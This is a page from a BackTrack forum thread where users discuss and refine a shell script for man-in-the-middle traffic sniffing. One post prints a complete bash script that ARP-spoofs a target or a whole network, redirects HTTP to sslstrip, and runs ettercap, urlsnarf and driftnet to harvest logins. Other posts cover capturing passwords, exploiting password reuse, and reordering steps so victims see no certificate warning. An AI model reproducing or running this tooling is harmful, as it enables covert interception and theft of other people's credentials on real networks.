Page 2 of 23 FirstFirst 123412 ... LastLast
Results 11 to 20 of 222

Thread: Script for sniffing traffic.

  1. #11
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Script for sniffing traffic.

    The link on http://comax.pagesperso-orange.fr/info/#yamas and the link http://comax.pagesperso-orange.fr/info/mitm/ both point to an old version of the script: VERSION="0.6.9\033[31m-BT5\033[m"

    If you download from the update link in the script, http://comax.pagesperso-orange.fr/mitm.sh, then you get the latest version: VERSION="0.7.2\033[31m-BT5\033[m"

    It's likely user error due to my lack of knowledge, but I couldn't get the 0.6.9 version to run while the 0.7.2 version ran without issue. With version 0.6.9 it was complaining about an error on line #10 that I couldn't find any problems with.

  2. #12
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Script for sniffing traffic.

    Yeahp, use updated 0.7.2-BT5 version, it's the last one to date ! I update the website only from time to time. But since it seems to be confusing, I'll do it as soon as I can ! I'll edit this post once everything is clarified, thanks for report
    Checked just after posting, the "download script" button links to the good version. The pastebin is "old" though. I'll update it as well !
    (Were you copying pastebin rather than downloading ?)

    EDIT : all right ! Everything should now point to the latest version. Also, please note that as soon as I have finished testing a "version", i upload it to the server. So even if the website doesn't say anything about it, you can try updating through the script or the website. Of course, don't hesitate to post here, PM me, or mail me for anything !
    Last edited by comaX; 05-18-2011 at 03:53 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #13
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Script for sniffing traffic.

    I think I did a save-as on the Download Raw link from the past-bin version. I thought this was the primary source location until I started digging through the script and noticed where it got the file from. Once I figured that out I just ran the wget line at a prompt to get the file.

  4. #14
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re : Re: Script for sniffing traffic.

    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    Any help would be appreciated.

  5. #15
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Re : Re: Script for sniffing traffic.

    Quote Originally Posted by ckcrown View Post
    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    Any help would be appreciated.
    Yeah, I thought about that, but the parsing is already pretty intense, so I didn't wanted to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script [*except for that little work-around mentioned earlier ]
    So about those sites, two things :
    1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
    2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

    If you have an idea for parsing sites as the same time as the rest, without being too much of a job, I'l all ears !

    On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There shortly will have an option to install it, and/or update it.
    Last edited by comaX; 05-21-2011 at 04:15 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  6. #16
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re: Re : Re: Script for sniffing traffic.

    ComaX,
    I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    Last edited by sickness; 05-21-2011 at 07:34 AM.

  7. #17
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Re : Re: Script for sniffing traffic.

    My vote is for option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to something like this. I could, and will figure it out by searching these forums, of course.

    Edit:

    Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

    Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.
    Last edited by sickness; 05-21-2011 at 07:35 AM. Reason: Merged posts.

  8. #18
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    14

    Default Re: Script for sniffing traffic.

    Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
    Here are some of them..
    Traceback (most recent call last):
    File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
    File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
    File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
    File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
    --- <exception caught here> ---
    File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
    why = getattr(selectable, method)()
    File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
    return self.protocol.dataReceived(data)
    File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
    return self.rawDataReceived(data)
    File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
    self.handleResponseEnd()
    File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
    File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
    self.handleResponse(b)
    File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 134, in handleResponse
    self.shutdown()
    File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 154, in shutdown
    self.client.finish()
    File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
    "Request.finish called on a request after its connection was lost; "
    exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

  9. #19
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Script for sniffing traffic.

    Thanks for the feedback !

    Quote Originally Posted by ckcrown View Post
    ComaX,
    I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?
    Hmm, I'll look into that But I won't spend to much time either, for the reasons I evoked earlier.

    Quote Originally Posted by ShortBuss View Post
    Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

    Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.
    Very good point ! I'll try and do that, it shouldn't be much of a problem. For arpspoof, I believe it is a clean shutdown, since in every test I did, I could get back on the internet immediately.

    [Edit] Status : DONE

    That's just great ! You don't have to click back into the main window for the name, so it's smoother, and that way we're sure we don't send non-stripped ssl. You just earned a place in the credits :P (If you don't want your nick in it, just tell me )
    I don't know why I didn't think of that before !
    And yes, arpspoof is cleanly shut.

    Quote Originally Posted by kafteras View Post
    Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
    Here are some of them..
    Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
    All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

    [Edit] Status : DONE

    Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !

    Thanks for the feedback again, I'll try to work on that tonight or tomorrow.

    Edit : with all that and some stuff here and there, 0.7.4 is ready ! It will be online tomorrow (22/05/11) !
    Last edited by comaX; 05-21-2011 at 04:53 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  10. #20
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    3

    Default Re: Script for sniffing traffic.

    Awesome script, thanks for putting the time into it.

Page 2 of 23 FirstFirst 123412 ... LastLast

Similar Threads

  1. Sniffing SSL Traffic on any application?
    By mortalz in forum Beginners Forum
    Replies: 3
    Last Post: 01-02-2011, 03:36 AM
  2. Replies: 10
    Last Post: 07-12-2010, 03:04 PM
  3. sniffing traffic
    By samer in forum OLD Pentesting
    Replies: 3
    Last Post: 03-27-2009, 01:39 PM
  4. Sniffing traffic between AP and Client.
    By cool_recep in forum OLD Newbie Area
    Replies: 8
    Last Post: 11-11-2008, 09:33 AM
  5. Sniffing Webcam traffic? How to do it?
    By Back|Track_user in forum OLD BackTrack v2.0 Final
    Replies: 2
    Last Post: 12-06-2007, 06:30 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •